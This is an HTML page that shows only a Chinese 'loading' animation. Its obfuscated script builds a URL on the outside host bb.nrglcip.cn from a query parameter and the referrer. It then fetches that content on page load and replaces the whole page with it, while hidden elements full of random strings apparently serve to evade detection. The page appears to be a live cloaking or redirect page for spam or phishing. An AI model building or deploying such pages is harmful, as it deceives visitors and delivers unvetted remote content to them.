<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .toPIbTv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .toPIbTv .Z2P9XMkV {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .toPIbTv .content {
            line-height: 50px;
            text-align: center
        }

        .toPIbTv .img {
            width: 100%
        }

        .toPIbTv .O1Alxk {
            text-align: center
        }

        .toPIbTv .O1Alxk span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .toPIbTv .O1Alxk span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .toPIbTv .O1Alxk span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .toPIbTv .O1Alxk span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .toPIbTv .O1Alxk span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .toPIbTv .O1Alxk span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .toPIbTv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function tSkTNvQ3bQ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Z0XIh9S = tSkTNvQ3bQ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Z0XIh9S +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Z0XIh9S +".html?a=share";
		}
		
        N2crP6=url+"#"+new Date().getTime();
        N2crP6 && function() {
            $.get(N2crP6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >mdQPaLnPA3zKPjEzAHCObgR9mViAeSBS</li>
<b style='display:none' >bFLMMLzVNVQGR8kf</b>
<a  href='#' style='display:none'>BJoMijbE7sDGoQB12Y</a>
<div style='display:none'>odCovStSWzLLSaqtqzmFesSRKpJRdXZiCXQ9Tv3zNXQ1xSxF</div>
<li style='display:none' >mdQPaLnPA3zKPjEzAHCObgR9mViAeSBS</li>
<span style='display:none'>L7wy9cdLXEkwMNXHkKROz8ZwHeWNpqMl8myHV2K9skpujtxvE</span>
<ul style='display:none' >rCqncbozVQnUxGgpwAlVVr0tjwuaPK9FgK2yEoM2X6Bllgcav8Dcli03W91uF6kzPP3Br6Gdn3pRLpc</ul>
<h1 style='display:none' >EGAxeulaito3zVJC</h1>
<h1 style='display:none' >EGAxeulaito3zVJC</h1>
<h1 style='display:none' >EGAxeulaito3zVJC</h1><div class="toPIbTv">
    <div class="Z2P9XMkV">
        <div class="O1Alxk">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>a0vhbJNBn2fIZ7hvJaTWNcJ2X8nTYcuGkeVfBQ6BvmdIiSZzbRHeaoZy46JMyDgRGAAoXmA6vBd4rbhH6yzVCqp</p>
<h1 style='display:none' >Gjr1dgHrOo2Y2eroHg9nJ8LzIW0q1826GOZmQ7Bwl21bjDJEB2kz3QmKxJ3JKip1jgI88AhRb3Ss6lydWUI03LfePCND</h1>
<p  style='display:none'>a0vhbJNBn2fIZ7hvJaTWNcJ2X8nTYcuGkeVfBQ6BvmdIiSZzbRHeaoZy46JMyDgRGAAoXmA6vBd4rbhH6yzVCqp</p>
<li style='display:none' >dlII8rNccly</li>
<a  href='#' style='display:none'>G9V1PpDJQca7CrnreMAiYII46hMBvnza</a>
<div style='display:none'>NzqKGZnSvRKKLPhrM5EfA1JXrAQKsJZUh0ORJtAmJkAQiTPZeXN0EEjk76monxuG1vJmoGkJW5mt0</div>
<ul style='display:none' >aEt2RphDyBHWD52HXrtqUC499OeipVOabD2zzoh3WzqOuQEIVPII2Tn</ul>
<b style='display:none' >x88J0yBxU1GbgLqHy0sjPt1DurtI</b></body>
</html>